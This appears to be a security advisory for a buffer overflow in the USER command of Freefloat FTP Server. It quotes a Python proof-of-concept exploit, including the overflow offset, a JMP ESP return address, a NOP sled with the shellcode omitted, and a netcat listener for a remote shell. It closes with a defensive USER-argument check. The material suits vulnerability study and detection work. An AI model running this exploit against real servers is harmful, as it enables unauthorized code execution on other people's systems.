Release date:
Updated on:
Affected Systems:
Freefloat FTP Server
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56865
Freefloat FTP Server is free software for uploading files and managing wired and wireless devices.
Freefloat FTP Server has a buffer overflow vulnerability in its parsing and processing of USER commands. Attackers can exploit this vulnerability to execute arbitrary code in the context of the affected application.
<* Source: D35m0nd142
Link: http://exploitarchive.com/freefloat-ftp-server-buffer-overflow/
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
# Exploit title: FreeFloat FTP Server Remote Command Execution USER Command Buffer Overflow
# Date: 06/12/2012
# Exploit Author: D35m0nd142
# Vendor homepage: http://www.freefoat.com
# Tested on Windows XP SP3 with Ubuntu 12.04
#!/usr/bin/python
import socket, sys, time, os
import Tkinter, tkMessageBox
os.system("clear")
def exploit():
    target = ip.get()
    junk = "\x41" * 230 # Offset Number --> 230
    eip = "\x53\x93\x37\x7E" # 0x7E379353 FFE4 JMP ESP
    nops = "\x90" * 20
    payload = ""  # shellcode bytes omitted
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((target, 21))
        print "\n[-] Sending exploit ..."
        print sock.recv(2000)
        sock.send("USER " + junk + eip + nops + payload + "\r\n")
        sock.close()
        os.system("nc -lvp 4444")
    except:
        print "[-] Connection to " + target + " failed!\n"
        sys.exit(0)
root = Tkinter.Tk()
root.geometry("%dx%d" % (700, 375))
root.title("*** FreeFloat FTP Server Remote Code Execution USER Command Buffer Overflow ***")
root['bg'] = 'black'
developer = Tkinter.Label(text="Developed by D35m0nd142").pack(side='bottom')
ip_answer = Tkinter.Label(text="IP Address").pack()
ip = Tkinter.StringVar()
ip_entry = Tkinter.Entry(textvariable=ip).pack()
exploit = Tkinter.Button(text="Exploit", command=exploit).pack()
root.mainloop()
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Freefloat
---------
The vendor has not yet provided a patch or upgrade. Users of the software should watch the vendor's homepage for the latest version:
http://www.freefloat.com/
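With no vendor patch available, oversized USER arguments can be flagged on the FTP control channel before they reach the server. The following Python 3 check is an added example, not part of the original advisory or the PoC author's code; the function name `inspect_ftp_control`, the limits `MAX_USER_LEN` and `MAX_LINE_LEN`, and the sample traffic are assumptions constructed for illustration.

```python
import re

# Assumed policy values (not from the advisory): legitimate FTP user names are
# short printable ASCII. The PoC needs 230 filler bytes before the return
# address, so any limit well below that rejects it.
MAX_USER_LEN = 64
MAX_LINE_LEN = 512
NON_PRINTABLE = re.compile(rb"[^\x20-\x7e]")


def inspect_ftp_control(stream: bytes):
    """Return a list of (line_number, reason) findings for USER commands."""
    findings = []
    # The last fragment is inspected even without a line terminator, because
    # an overflow attempt does not have to end the command cleanly.
    for number, raw in enumerate(stream.split(b"\n"), start=1):
        line = raw.rstrip(b"\r")
        if not line:
            continue
        if len(line) > MAX_LINE_LEN:
            findings.append((number, "control line exceeds %d bytes" % MAX_LINE_LEN))
        # Match on the verb prefix so a missing separator is still inspected.
        if line[:4].upper() != b"USER":
            continue
        arg = line[4:].lstrip(b" ")
        if len(arg) > MAX_USER_LEN:
            findings.append((number, "USER argument is %d bytes" % len(arg)))
        if NON_PRINTABLE.search(arg):
            findings.append((number, "USER argument contains non-printable bytes"))
    return findings


# Constructed sample traffic: one normal login, then an oversized USER command
# shaped like the PoC (filler plus NOP bytes, no shellcode).
SAMPLE = (
    b"USER anonymous\r\n"
    b"PASS guest@example.com\r\n"
    b"USER " + b"A" * 230 + b"\x90" * 20 + b"\r\n"
)

if __name__ == "__main__":
    for number, reason in inspect_ftp_control(SAMPLE):
        print("line %d: %s" % (number, reason))
```

The same two conditions (argument length and non-printable bytes after `USER`) can be expressed as a rule in a network IDS or an FTP-aware proxy placed in front of the server.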